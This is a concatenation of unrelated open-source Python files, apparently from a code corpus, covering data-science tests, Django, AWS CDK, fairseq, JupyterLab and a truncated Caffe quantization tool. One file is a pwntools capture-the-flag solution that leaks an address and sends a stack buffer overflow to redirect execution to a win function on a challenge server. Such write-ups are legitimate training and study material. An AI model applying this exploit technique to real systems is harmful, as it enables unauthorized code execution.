test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \ joinpath("test_output_datatypes") test_output_dir.mkdir(parents=True, exist_ok=True) test_output_dir = str(test_output_dir) test_output_file = str(pathlib.Path(test_output_dir). \ joinpath("column_datatypes.json")) # Set the output datatypes to a known good values; # here we're JUST testing the writing out of the file schema_generator.output_datatypes = \ copy.deepcopy(VALID_TEST_COLUMN_DATATYPES) # Test writing out to a non-existent directory retval = schema_generator.output_column_datatypes_json( output_directory="foo") self.assertEqual(retval, None) # Test success path retval = None retval = schema_generator.output_column_datatypes_json(output_directory= test_output_dir) self.assertEqual(retval, test_output_file) self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_DATATYPES_FILE), msg = test_output_file + " does not match " + VALID_OUTPUT_DATATYPES_FILE) def test__load_csv_succeeds(self): """ Test that the `SchemaGenerator._load_csv` method can be used to read in an appropriately formatted CSV file. """ schema_generator = schemagen.SchemaGenerator() # Confirm that a valid CSV loads into a DataFrame without throwing errors result = schema_generator._load_csv(VALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access self.assertIsInstance(result, pd.core.frame.DataFrame) def test__load_csv_fails(self): """ Test that the `SchemaGenerator._load_csv` method fails when it tries to read a badly formatted CSV or is given an empty filename. """ schema_generator = schemagen.SchemaGenerator() # Confirm that the FileNotFoundError is raised for a non-existing file with self.assertRaises(FileNotFoundError): schema_generator._load_csv("") # We want to test private methods... pylint: disable=protected-access # Confirm that the ParserError is raised when it can't parse the file with self.assertRaises(pd.errors.ParserError): schema_generator._load_csv(INVALID_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access # Confirm that the EmptyDataError is raised if called against an empty file with self.assertRaises(pd.errors.EmptyDataError): schema_generator._load_csv(EMPTY_INPUT_DATA_FILE) # We want to test private methods... pylint: disable=protected-access def test__build_schema_succeeds(self): """ Test that the `SchemaGenerator._build_schema` method can build an expected schema from a properly formatted DataFrame. """ schema_generator = schemagen.SchemaGenerator() # Confirm that when we build schema off of our test dataframe, # we get a result that looks like our expected schema (params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME, include_text_columns=True) # We want to test private methods... pylint: disable=protected-access self.assertEqual(params, VALID_TEST_SCHEMA) self.assertEqual(columns, VALID_TEST_COLUMN_DATATYPES) # Confirm that when we build schema off of our test dataframe, # and include "na", we get a result that looks like we expect (params, columns) = schema_generator._build_schema(VALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access include_text_columns=True, include_na=True) valid_schema_with_nan = copy.deepcopy(VALID_TEST_SCHEMA) valid_schema_with_nan["schema"]["A"]["values"].append(np.NaN) # Including NaN is going to make everything in the column a float valid_schema_with_nan["schema"]["A"]["dtype"] = "float" valid_schema_with_nan["schema"]["A"]["values"] = \ list(map(float, valid_schema_with_nan["schema"]["A"]["values"])) valid_schema_with_nan["schema"]["A"]["codes"] = \ [1, 2, 3, 4, 5, 6] valid_dtypes_with_nan = copy.deepcopy(VALID_TEST_COLUMN_DATATYPES) valid_dtypes_with_nan["dtype"]["A"] = "float" # Need to use np's assertion in order to make NaN == NaN np.testing.assert_equal(params, valid_schema_with_nan) self.assertEqual(columns, valid_dtypes_with_nan) def test__build_schema_fails(self): """ Test that the `SchemaGenerator._build_schema` method fails appropriately when trying to build a schema from something that is not a DataFrame. """ schema_generator = schemagen.SchemaGenerator() # Confirm that when we build schema off of our test invalid dataframe, # we fail in the right way with self.assertRaises(AttributeError): schema_generator._build_schema(INVALID_TEST_DATAFRAME, # We want to test private methods... pylint: disable=protected-access max_values_for_categorical = 4) def test__getters(self): """ Test that the getters for the output schema and the column datatypes return the correct objects. """ schema_generator = schemagen.SchemaGenerator() schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA) self.assertEqual(schema_generator.get_parameters_json(), VALID_TEST_SCHEMA) schema_generator.output_datatypes = \ copy.deepcopy(VALID_TEST_COLUMN_DATATYPES) self.assertEqual(schema_generator.get_column_datatypes_json(), VALID_TEST_COLUMN_DATATYPES) def test__get_series_dtype(self): """ Test that the method that determines the appropriate datatype, min, and max values does the right thing. """ schema_generator = schemagen.SchemaGenerator() series = pd.Series(["a", "b", "c", "d"]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("str", None, None)) series = pd.Series([1, 2, 2, 3, 4, 5, 6, 7, 8, 9]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("uint8", 1, 9)) series = pd.Series(list(range(1000000, 1000050, 1))) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("uint32", 1000000, 1000049)) series = pd.Series([0.1, 0.15, 0.2, 0.214, 0.25]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("float", 0.1, 0.25)) series = pd.Series([-1, 0, 1, -2, 0, -3]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("int8", -3, 1)) # If min is 0, don't "fuzz" it, to avoid going negative series = pd.Series([0, 1, 2, 3, 4, 5]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("uint8", 0, 5)) series = pd.Series(["2021-02-25", "2021-01-05", "2021-06-22"]) self.assertEqual(schema_generator._get_series_dtype(series), # We want to test private methods... pylint: disable=protected-access ("date", "2021-01-05 00:00:00", "2021-06-22 00:00:00")) if __name__ == "__main__": unittest.main()
2.59375
3
core/migrations/0008_auto_20190528_1802.py
peterson-dev/code-snippet-app
2
11023
<reponame>peterson-dev/code-snippet-app # Generated by Django 2.2.1 on 2019-05-28 22:02 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', '0007_auto_20190523_1740'), ] operations = [ migrations.RenameField( model_name='snippet', old_name='post_content', new_name='content', ), ]
1.65625
2
scripts/Biupdownsample/grad_check.py
dongdong93/a2u_matting
22
11024
import os.path as osp import sys import subprocess subprocess.call(['pip', 'install', 'cvbase']) import cvbase as cvb import torch from torch.autograd import gradcheck sys.path.append(osp.abspath(osp.join(__file__, '../../'))) from biupdownsample import biupsample_naive, BiupsampleNaive from biupdownsample import bidownsample_naive, BidownsampleNaive feat = torch.randn(2, 64, 2, 2, requires_grad=True, device='cuda:0').double() mask = torch.randn( 2, 100, 4, 4, requires_grad=True, device='cuda:0').sigmoid().double() print('Gradcheck for biupsample naive...') test = gradcheck(BiupsampleNaive(5, 4, 2), (feat, mask), atol=1e-4, eps=1e-4) print(test) feat = torch.randn( 2, 1024, 100, 100, requires_grad=True, device='cuda:0').float() mask = torch.randn( 2, 25, 200, 200, requires_grad=True, device='cuda:0').sigmoid().float() loop_num = 500 time_naive_forward = 0 time_naive_backward = 0 bar = cvb.ProgressBar(loop_num) timer = cvb.Timer() for i in range(loop_num): x = biupsample_naive(feat.clone(), mask.clone(), 5, 1, 2) torch.cuda.synchronize() time_naive_forward += timer.since_last_check() x.sum().backward(retain_graph=True) torch.cuda.synchronize() time_naive_backward += timer.since_last_check() bar.update() forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num print('\nBiupsample naive time forward: ' f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter') # --------------------------------------------------------------- feat = torch.randn(2, 64, 4, 4, requires_grad=True, device='cuda:0').double() mask = torch.randn( 2, 16, 4, 4, requires_grad=True, device='cuda:0').double() print('Gradcheck for bidownsample naive...') test = gradcheck(BidownsampleNaive(4, 1, 1), (feat, mask), atol=1e-4, eps=1e-4) print(test) feat = torch.randn( 2, 512, 200, 200, requires_grad=True, device='cuda:0').float() mask = torch.randn( 2, 100, 100, 100, requires_grad=True, device='cuda:0').sigmoid().float() loop_num = 500 time_naive_forward = 0 time_naive_backward = 0 bar = cvb.ProgressBar(loop_num) timer = cvb.Timer() for i in range(loop_num): x = bidownsample_naive(feat.clone(), mask.clone(), 10, 1, 2) torch.cuda.synchronize() time_naive_forward += timer.since_last_check() x.sum().backward(retain_graph=True) torch.cuda.synchronize() time_naive_backward += timer.since_last_check() bar.update() forward_speed = (time_naive_forward + 1e-3) * 1e3 / loop_num backward_speed = (time_naive_backward + 1e-3) * 1e3 / loop_num print('\nBidownsample naive time forward: ' f'{forward_speed} ms/iter | time backward: {backward_speed} ms/iter')
2.046875
2
sunshinectf2020/speedrun/exploit_05.py
nhtri2003gmail/ctf-write-ups
101
11025
<reponame>nhtri2003gmail/ctf-write-ups<filename>sunshinectf2020/speedrun/exploit_05.py #!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./chall_05') if not args.REMOTE: p = process(binary.path) else: p = remote('chal.2020.sunshinectf.org', 30005) p.sendlineafter('Race, life\'s greatest.\n','foobar') p.recvuntil('Yes I\'m going to win: ') _ = p.recvline().strip() main = int(_,16) binary.address = main - binary.sym.main log.info('binary.address: ' + hex(binary.address)) payload = b'' payload += 56 * b'A' payload += p64(binary.sym.win) p.sendline(payload) p.interactive()
2
2
coderedcms/wagtail_flexible_forms/edit_handlers.py
mikiec84/coderedcms
9
11026
from django.template.loader import render_to_string from django.utils.safestring import mark_safe from django.utils.translation import ugettext as _ from wagtail.admin.edit_handlers import EditHandler class FormSubmissionsPanel(EditHandler): template = "wagtailforms/edit_handlers/form_responses_panel.html" def bind_to_model(self, model): new = super().bind_to_model(model) if self.heading is None: new.heading = _('{} submissions').format(model.get_verbose_name()) return new def render(self): Submission = self.model.get_submission_class() submissions = Submission.objects.filter(page=self.instance) submission_count = submissions.count() if not submission_count: return '' return mark_safe(render_to_string(self.template, { 'self': self, 'submission_count': submission_count, 'last_submit_time': (submissions.order_by('submit_time') .last().submit_time), }))
1.914063
2
python/elasticache/cache/helper/vpc.py
chejef/aws-cdk-examples-proserve
6
11027
<reponame>chejef/aws-cdk-examples-proserve<filename>python/elasticache/cache/helper/vpc.py<gh_stars>1-10 from aws_cdk import ( core as cdk, aws_elasticache as elasticache, aws_ec2 as ec2, ) from aws_cdk.core import Tags from config import config_util as config def get_vpc(scope: cdk.Construct) -> ec2.Vpc: """ Look up and return the none default vpc. Args: scope: the cdk construct. Returns: ec2.Vpc: The ec2 VPC object based on the vpc id. """ vpc = ec2.Vpc.from_lookup( scope, "vpc", is_default=False, vpc_id=config.get_vpc_id() ) return vpc def get_security_group(scope: cdk.Construct) -> ec2.SecurityGroup: """ Create and return the security group for the cluster which allows for any ipv4 and configured port number. Args: scope: the cdk construct. Returns: ec2.SecurityGroup: The ec2 Security Group object for the cluster. """ cluster_name = config.get_cluster_name() vpc = get_vpc(scope) security_group = ec2.SecurityGroup( scope, "ElastiCacheSecurityGroup", vpc=vpc, allow_all_outbound=True, security_group_name=f"elasticache-sg-{cluster_name}", description=f"Security Group for {cluster_name} ElastiCache Cluster", ) Tags.of(security_group).add("Name", f"elasticache-sg-{cluster_name}") for allowed_cidr in config.get_allowed_cidrs(): security_group.add_ingress_rule( ec2.Peer.ipv4(allowed_cidr), ec2.Port.tcp(config.get_port_number()), f"Allows connection to ElastiCache cluster {cluster_name}." ) return security_group def get_subnet_group(scope: cdk.Construct) -> elasticache.CfnSubnetGroup: """ Create and return the elasticache subnet group. Args: scope: the cdk construct. Returns: elasticache.CfnSubnetGroup: The subnet group that contains the subnets in vpc. """ cluster_name = config.get_cluster_name() subnet_group = elasticache.CfnSubnetGroup( scope, "ElastiCacheSubnetGroup", cache_subnet_group_name=f"{cluster_name}-subnet-group", description=f"ElastiCache subnet group for {cluster_name}", subnet_ids=config.get_subnet_ids() ) return subnet_group
2.40625
2
src/pyscaffold/extensions/namespace.py
jayvdb/pyscaffold
2
11028
# -*- coding: utf-8 -*- """ Extension that adjust project file tree to include a namespace package. This extension adds a **namespace** option to :obj:`~pyscaffold.api.create_project` and provides correct values for the options **root_pkg** and **namespace_pkg** to the following functions in the action list. """ import argparse import os from os.path import isdir from os.path import join as join_path from .. import templates, utils from ..api import Extension, helpers from ..log import logger class Namespace(Extension): """Add a namespace (container package) to the generated package.""" def augment_cli(self, parser): """Add an option to parser that enables the namespace extension. Args: parser (argparse.ArgumentParser): CLI parser object """ parser.add_argument( self.flag, dest=self.name, default=None, action=create_namespace_parser(self), metavar="NS1[.NS2]", help="put your project inside a namespace package") def activate(self, actions): """Register an action responsible for adding namespace to the package. Args: actions (list): list of actions to perform Returns: list: updated list of actions """ actions = helpers.register(actions, enforce_namespace_options, after='get_default_options') actions = helpers.register(actions, add_namespace, before='apply_update_rules') return helpers.register(actions, move_old_package, after='create_structure') def create_namespace_parser(obj_ref): """Create a namespace parser. Args: obj_ref (Extension): object reference to the actual extension Returns: NamespaceParser: parser for namespace cli argument """ class NamespaceParser(argparse.Action): """Consumes the values provided, but also appends the extension function to the extensions list. """ def __call__(self, parser, namespace, values, option_string=None): namespace.extensions.append(obj_ref) # Now the extra parameters can be stored setattr(namespace, self.dest, values) # save the namespace cli argument for later obj_ref.args = values return NamespaceParser def enforce_namespace_options(struct, opts): """Make sure options reflect the namespace usage.""" opts.setdefault('namespace', None) if opts['namespace']: opts['ns_list'] = utils.prepare_namespace(opts['namespace']) opts['root_pkg'] = opts['ns_list'][0] opts['qual_pkg'] = ".".join([opts['ns_list'][-1], opts['package']]) return struct, opts def add_namespace(struct, opts): """Prepend the namespace to a given file structure Args: struct (dict): directory structure as dictionary of dictionaries opts (dict): options of the project Returns: tuple(dict, dict): directory structure as dictionary of dictionaries and input options """ if not opts['namespace']: return struct, opts namespace = opts['ns_list'][-1].split('.') base_struct = struct struct = base_struct[opts['project']]['src'] pkg_struct = struct[opts['package']] del struct[opts['package']] for sub_package in namespace: struct[sub_package] = {'__init__.py': templates.namespace(opts)} struct = struct[sub_package] struct[opts['package']] = pkg_struct return base_struct, opts def move_old_package(struct, opts): """Move old package that may be eventually created without namespace Args: struct (dict): directory structure as dictionary of dictionaries opts (dict): options of the project Returns: tuple(dict, dict): directory structure as dictionary of dictionaries and input options """ old_path = join_path(opts['project'], 'src', opts['package']) namespace_path = opts['qual_pkg'].replace('.', os.sep) target = join_path(opts['project'], 'src', namespace_path) old_exists = opts['pretend'] or isdir(old_path) # ^ When pretending, pretend also an old folder exists # to show a worst case scenario log to the user... if old_exists and opts['qual_pkg'] != opts['package']: if not opts['pretend']: logger.warning( '\nA folder %r exists in the project directory, and it is ' 'likely to have been generated by a PyScaffold extension or ' 'manually by one of the current project authors.\n' 'Moving it to %r, since a namespace option was passed.\n' 'Please make sure to edit all the files that depend on this ' 'package to ensure the correct location.\n', opts['package'], namespace_path) utils.move(old_path, target=target, log=True, pretend=opts['pretend']) return struct, opts
2.3125
2
tests/solr_tests/tests/test_templatetags.py
speedplane/django-haystack
1
11029
# encoding: utf-8 from mock import call, patch from django.template import Template, Context from django.test import TestCase from core.models import MockModel @patch("haystack.templatetags.more_like_this.SearchQuerySet") class MoreLikeThisTagTestCase(TestCase): def render(self, template, context): # Why on Earth does Django not have a TemplateTestCase yet? t = Template(template) c = Context(context) return t.render(c) def test_more_like_this_without_limit(self, mock_sqs): mock_model = MockModel.objects.get(pk=3) template = """{% load more_like_this %}{% more_like_this entry as related_content %}{% for rc in related_content %}{{ rc.id }}{% endfor %}""" context = {'entry': mock_model} mlt = mock_sqs.return_value.more_like_this mlt.return_value = [{"id": "test_id"}] self.assertEqual("test_id", self.render(template, context)) mlt.assert_called_once_with(mock_model) def test_more_like_this_with_limit(self, mock_sqs): mock_model = MockModel.objects.get(pk=3) template = """{% load more_like_this %}{% more_like_this entry as related_content limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}""" context = {'entry': mock_model} mlt = mock_sqs.return_value.more_like_this mlt.return_value.__getitem__.return_value = [{"id": "test_id"}] self.assertEqual("test_id", self.render(template, context)) mlt.assert_called_once_with(mock_model) mock_sqs.assert_has_calls([call().more_like_this(mock_model), call().more_like_this().__getitem__(slice(None, 5))], any_order=True) def test_more_like_this_for_model(self, mock_sqs): mock_model = MockModel.objects.get(pk=3) template = """{% load more_like_this %}{% more_like_this entry as related_content for "core.mock" limit 5 %}{% for rc in related_content %}{{ rc.id }}{% endfor %}""" context = {'entry': mock_model} self.render(template, context) mock_sqs.assert_has_calls([call().models().more_like_this(mock_model), call().models().more_like_this().__getitem__(slice(None, 5))], any_order=True)
2.453125
2
tests_project/homepage/views/__init__.py
wynnw/django-mako-plus
79
11030
<filename>tests_project/homepage/views/__init__.py<gh_stars>10-100 from django_mako_plus.converter import ParameterConverter from django_mako_plus import view_function from django.http import HttpRequest class RecordingConverter(ParameterConverter): '''Converter that also records the converted variables for inspecting during testing''' def convert_parameters(self, *args, **kwargs): # request is usually args[0], but it can be args[1] when using functools.partial in the decorator request = args[1] if len(args) >= 2 and isinstance(args[1], HttpRequest) else args[0] args, kwargs = super().convert_parameters(*args, **kwargs) request.dmp.converted_params = kwargs return args, kwargs
2.375
2
jupyterlab_bigquery/jupyterlab_bigquery/__init__.py
shunr/jupyter-extensions
0
11031
<filename>jupyterlab_bigquery/jupyterlab_bigquery/__init__.py from notebook.utils import url_path_join from jupyterlab_bigquery.list_items_handler import handlers from jupyterlab_bigquery.details_handler import DatasetDetailsHandler, TablePreviewHandler, TableDetailsHandler from jupyterlab_bigquery.version import VERSION from jupyterlab_bigquery.pagedAPI_handler import PagedQueryHandler from jupyterlab_bigquery.query_incell_editor import QueryIncellEditor, _cell_magic __version__ = VERSION def _jupyter_server_extension_paths(): return [{'module': 'jupyterlab_bigquery'}] def load_jupyter_server_extension(nb_server_app): """ Called when the extension is loaded. Args: nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance. """ host_pattern = '.*$' app = nb_server_app.web_app gcp_v1_endpoint = url_path_join(app.settings['base_url'], 'bigquery', 'v1') def make_endpoint(endPoint, handler): return url_path_join(gcp_v1_endpoint, endPoint) + '(.*)', handler app.add_handlers( host_pattern, [ (url_path_join(gcp_v1_endpoint, k) + "(.*)", v) for (k, v) in handlers.items() ], ) app.add_handlers(host_pattern, [ # TODO(cbwilkes): Add auth checking if needed. # (url_path_join(gcp_v1_endpoint, auth'), AuthHandler) make_endpoint('list', ListHandler), make_endpoint('datasetdetails', DatasetDetailsHandler), make_endpoint('tabledetails', TableDetailsHandler), make_endpoint('tablepreview', TablePreviewHandler), make_endpoint('query', PagedQueryHandler) ]) def load_ipython_extension(ipython): """Called by IPython when this module is loaded as an IPython extension.""" ipython.register_magic_function( _cell_magic, magic_kind="line", magic_name="bigquery_editor" ) ipython.register_magic_function( _cell_magic, magic_kind="cell", magic_name="bigquery_editor" )
2.1875
2
ios_notifications/migrations/0004_auto_20141105_1515.py
chillbear/django-ios-notifications
2
11032
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import django_fields.fields class Migration(migrations.Migration): dependencies = [ ('ios_notifications', '0003_notification_loc_payload'), ] operations = [ migrations.AlterField( model_name='apnservice', name='passphrase', field=django_fields.fields.EncryptedCharField(help_text=b'Passphrase for the private key', max_length=101, null=True, blank=True), preserve_default=True, ), ]
1.609375
2
fairseq/tasks/audio_pretraining.py
hwp/fairseq
4
11033
# Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the license found in the LICENSE file in # the root directory of this source tree. An additional grant of patent rights # can be found in the PATENTS file in the same directory. import editdistance import os import sys import torch from fairseq.data import AddTargetDataset, Dictionary, FileAudioDataset, encoders from fairseq.data.data_utils import post_process from . import LegacyFairseqTask, register_task from .. import utils from ..logging import metrics class LabelEncoder(object): def __init__(self, dictionary): self.dictionary = dictionary def __call__(self, label): return self.dictionary.encode_line( label, append_eos=False, add_if_not_exist=False ) @register_task("audio_pretraining") class AudioPretrainingTask(LegacyFairseqTask): """""" @staticmethod def add_args(parser): """Add task-specific arguments to the parser.""" parser.add_argument("data", help="path to data directory") parser.add_argument( "--sample-rate", default=16000, type=int, help="target sample rate. audio files will be up/down sampled to this rate", ) parser.add_argument( "--normalize", action="store_true", help="if set, normalizes input to have 0 mean and unit variance", ) parser.add_argument( "--max-sample-size", default=None, type=int, help="max sample size to crop to for batching. default = min sample length", ) parser.add_argument( "--min-sample-size", default=None, type=int, help="min sample size to crop to for batching. default = same as --max-sample-size", ) parser.add_argument( "--enable-padding", action="store_true", help="pad shorter samples instead of cropping", ) parser.add_argument( "--labels", type=str, default=None, help="extension of the label file to load, if any", ) # Options for reporting WER metrics during validation. Only applicable to # Seq2Seq models during fine-tuning parser.add_argument( "--eval-wer", action="store_true", help="compute WER for Seq2Seq models", ) parser.add_argument( "--eval-wer-remove-bpe", default="letter", help="remove BPE tokens before scoring (can be sentencepiece, letter, and more)", ) def __init__(self, args, source_dictionary=None, target_dictionary=None): super().__init__(args) self._target_dictionary = target_dictionary self._source_dictionary = source_dictionary self.is_ctc = args.criterion == "ctc" if getattr(self.args, "eval_wer", False): assert args.labels is not None, "eval_wer can only be set during fine-tuning" @classmethod def setup_task(cls, args, **kwargs): """Setup the task (e.g., load dictionaries). Args: args (omegaconf.DictConfig): parsed command-line arguments """ if args.labels: dict_path = os.path.join(args.data, f"dict.{args.labels}.txt") target_dictionary = Dictionary.load(dict_path) else: target_dictionary = None return cls(args, target_dictionary=target_dictionary) def load_dataset(self, split, **kwargs): """Load a given dataset split. Args: split (str): name of the split (e.g., train, valid, test) """ manifest = os.path.join(self.args.data, "{}.tsv".format(split)) self.datasets[split] = FileAudioDataset( manifest, sample_rate=self.args.sample_rate, max_sample_size=self.args.max_sample_size, min_sample_size=self.args.max_sample_size, min_length=self.args.min_sample_size, pad=self.args.labels is not None or self.args.enable_padding, normalize=self.args.normalize, ) if self.args.labels: label_path = os.path.join(self.args.data, f"{split}.{self.args.labels}") labels = [] with open(label_path, "r") as f: for line in f: labels.append(line) process_label = LabelEncoder(self.target_dictionary) self.datasets[split] = AddTargetDataset( self.datasets[split], labels, pad=self.target_dictionary.pad(), eos=self.target_dictionary.eos(), batch_targets=True, process_label=process_label, add_to_input=not self.is_ctc, ) @property def source_dictionary(self): return self._source_dictionary @property def target_dictionary(self): """Return the :class:`~fairseq.data.Dictionary` for the language model.""" return self._target_dictionary def max_positions(self): """Maximum input length supported by the encoder.""" return (sys.maxsize, sys.maxsize) def filter_indices_by_size( self, indices, dataset, max_positions=None, ignore_invalid_inputs=False, ): # we do not need to filter by size in this task as dataloaders take care of this return indices def valid_step(self, sample, model, criterion): loss, sample_size, logging_output = super().valid_step(sample, model, criterion) if getattr(self.args, "eval_wer", False) and not self.is_ctc: metrics = self._inference_with_wer(self.sequence_generator, sample, model) logging_output["_num_char_errors"] = metrics["num_char_errors"] logging_output["_num_chars"] = metrics["num_chars"] logging_output["_num_word_errors"] = metrics["num_word_errors"] logging_output["_num_words"] = metrics["num_words"] return loss, sample_size, logging_output def build_model(self, args): model = super().build_model(args) if getattr(args, 'eval_wer', False) and not self.is_ctc: self.sequence_generator = self.build_generator([model], args, ) self.tokenizer = encoders.build_tokenizer(args) return model def _inference_with_wer(self, generator, sample, model): def decode(toks, escape_unk=True): s = self.target_dictionary.string( toks.int().cpu(), self.args.eval_wer_remove_bpe, escape_unk=escape_unk, extra_symbols_to_ignore={generator.eos}, ) if self.tokenizer: s = self.tokenizer.decode(s) return s num_word_errors, num_char_errors = 0, 0 num_chars, num_words = 0, 0 gen_out = self.inference_step(generator, [model], sample, None) for i in range(len(gen_out)): hyp = decode(gen_out[i][0]["tokens"]) ref = decode( utils.strip_pad(sample["target"][i], self.target_dictionary.pad()), escape_unk=True, ) hyp = post_process(hyp, self.args.eval_wer_remove_bpe).strip("_") ref = post_process(ref, self.args.eval_wer_remove_bpe).strip("_") num_char_errors += editdistance.eval(hyp, ref) num_chars += len(ref) hyp_words = hyp.split("_") ref_words = ref.split("_") num_word_errors += editdistance.eval(hyp_words, ref_words) num_words += len(ref_words) return { "num_char_errors": num_char_errors, "num_chars": num_chars, "num_word_errors": num_word_errors, "num_words": num_words, } def reduce_metrics(self, logging_outputs, criterion): super().reduce_metrics(logging_outputs, criterion) zero = torch.scalar_tensor(0.) num_char_errors = sum(log.get("_num_char_errors", zero) for log in logging_outputs) num_chars = sum(log.get("_num_chars", zero) for log in logging_outputs) num_word_errors = sum(log.get("_num_word_errors", zero) for log in logging_outputs) num_words = sum(log.get("_num_words", zero) for log in logging_outputs) metrics.log_scalar("_num_char_errors", num_char_errors) metrics.log_scalar("_num_chars", num_chars) metrics.log_scalar("_num_word_errors", num_word_errors) metrics.log_scalar("_num_words", num_words) if num_words > 0: metrics.log_derived( "uer", lambda meters: meters["_num_char_errors"].sum * 100.0 / meters["_num_chars"].sum if meters["_num_chars"].sum > 0 else float("nan") ) metrics.log_derived( "wer", lambda meters: meters["_num_word_errors"].sum * 100.0 / meters["_num_words"].sum if meters["_num_words"].sum > 0 else float("nan") )
1.859375
2
caffe-int8-convert-tool-dev.py
daquexian/caffe-int8-convert-tools
0
11034
<reponame>daquexian/caffe-int8-convert-tools<gh_stars>0 # -*- coding: utf-8 -*- # SenseNets is pleased to support the open source community by making caffe-int8-convert-tool available. # # Copyright (C) 2018 SenseNets Technology Ltd. All rights reserved. # # Licensed under the BSD 3-Clause License (the "License"); you may not use this file except # in compliance with the License. You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. """ Quantization module for generating the calibration tables will be used by quantized (INT8) models from FP32 models. This tool is based on Caffe Framework. """ from __future__ import division from __future__ import print_function import argparse import numpy as np import math, copy import matplotlib.pyplot as plt import sys,os import caffe import caffe.proto.caffe_pb2 as caffe_pb2 import time import datetime from google.protobuf import text_format def parse_args(): parser = argparse.ArgumentParser( description='find the pretrained caffe models int8 quantize scale value') parser.add_argument('--proto', dest='proto', help="path to deploy prototxt.", type=str) parser.add_argument('--model', dest='model', help='path to pretrained weights', type=str) parser.add_argument('--mean', dest='mean', help='value of mean', type=float, nargs=3) parser.add_argument('--norm', dest='norm', help='value of normalize', type=float, nargs=1, default=1.0) parser.add_argument('--images', dest='images', help='path to calibration images', type=str) parser.add_argument('--output', dest='output', help='path to output calibration table file', type=str, default='calibration-dev.table') parser.add_argument('--group', dest='group', help='enable the group scale', type=int, default=0) parser.add_argument('--gpu', dest='gpu', help='use gpu to forward', type=int, default=0) args = parser.parse_args() return args, parser global args, parser args, parser = parse_args() # global params QUANTIZE_NUM = 127 STATISTIC = 1 INTERVAL_NUM = 2048 # ugly global params quantize_layer_lists = [] class QuantizeLayer: def __init__(self, name, blob_name, group_num): self.name = name self.blob_name = blob_name self.group_num = group_num self.weight_scale = [0 for x in range(0, group_num)] self.blob_max = [0 for x in range(0, group_num)] self.blob_distubution_interval = [0 for x in range(0, group_num)] self.blob_distubution = [[0 for col in range(INTERVAL_NUM)] for row in range(group_num)] self.blob_scale = [1 for x in range(0, group_num)] self.group_zero = [0 for x in range(0, group_num)] def quantize_weight(self, weight_data): # spilt the weight data by group num blob_group_data = np.array_split(weight_data, self.group_num) for i, group_data in enumerate(blob_group_data): max_val = np.max(group_data) min_val = np.min(group_data) threshold = max(abs(max_val), abs(min_val)) if threshold < 0.0001: self.weight_scale[i] = 0 self.group_zero[i] = 1 else: self.weight_scale[i] = QUANTIZE_NUM / threshold print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, threshold, self.weight_scale[i])) def initial_blob_max(self, blob_data): # spilt the blob data by group num blob_group_data = np.array_split(blob_data, self.group_num) # interval for per bottom blob group channel for i, group_data in enumerate(blob_group_data): max_val = np.max(group_data) min_val = np.min(group_data) self.blob_max[i] = max(self.blob_max[i], max(abs(max_val), abs(min_val))) def initial_blob_distubution_interval(self): for i in range(0, self.group_num): if self.blob_max[i] < 0.000001: self.blob_scale[i] = 0 self.group_zero[i] = 1 self.blob_distubution_interval[i] = 0 else: self.blob_distubution_interval[i] = STATISTIC * self.blob_max[i] / INTERVAL_NUM print("%-20s group : %-5d max_val : %-10.8f distribution_intervals : %-10.8f" % (self.name, i, self.blob_max[i], self.blob_distubution_interval[i])) def initial_histograms(self, blob_data): # spilt the blob data by group num blob_group_data = np.array_split(blob_data, self.group_num) # interval for per bottom blob group channel for i, group_data in enumerate(blob_group_data): if self.blob_scale[i] == 0: continue else: # collect histogram of every group channel blob add_to_distribution(group_data, self.blob_distubution[i], self.blob_distubution_interval[i]) def quantize_blob(self): # calculate threshold for i in range(0, self.group_num): # sparse DepthwiseConvolution if self.blob_scale[i] == 0: print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, 0, 0, self.blob_distubution_interval[i], self.blob_scale[i])) else: # normalize distributions normalize_distribution(self.blob_distubution[i]) distribution = np.array(self.blob_distubution[i]) # pick threshold which minimizes KL divergence threshold_bin = threshold_distribution(distribution) threshold = (threshold_bin + 0.5) * self.blob_distubution_interval[i] # get the activation calibration value self.blob_scale[i] = QUANTIZE_NUM / threshold print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, threshold_bin, threshold, self.blob_distubution_interval[i], self.blob_scale[i])) def display_sparse_info(self): count = 0 for i in range(self.group_num): if self.group_zero[i] != 0: count += 1 print("%-20s group total : %-8d group sparse : %-8d ratio : %-6.2f " % (self.name, self.group_num, count, count / float(self.group_num) * 100)) def save_calibration(file_path): pass def add_to_distribution(blob, distribution, interval): """ add the distribution Args: blob: the output blob of caffe layer distribution: a list ,size is 2048 interval: a float number Returns: none """ max_index = len(distribution) - 1 indexes = np.minimum((np.abs(blob[blob!=0]) / interval).astype(np.int32), max_index) for index in indexes: distribution[index] = distribution[index] + 1 def normalize_distribution(distribution): """ 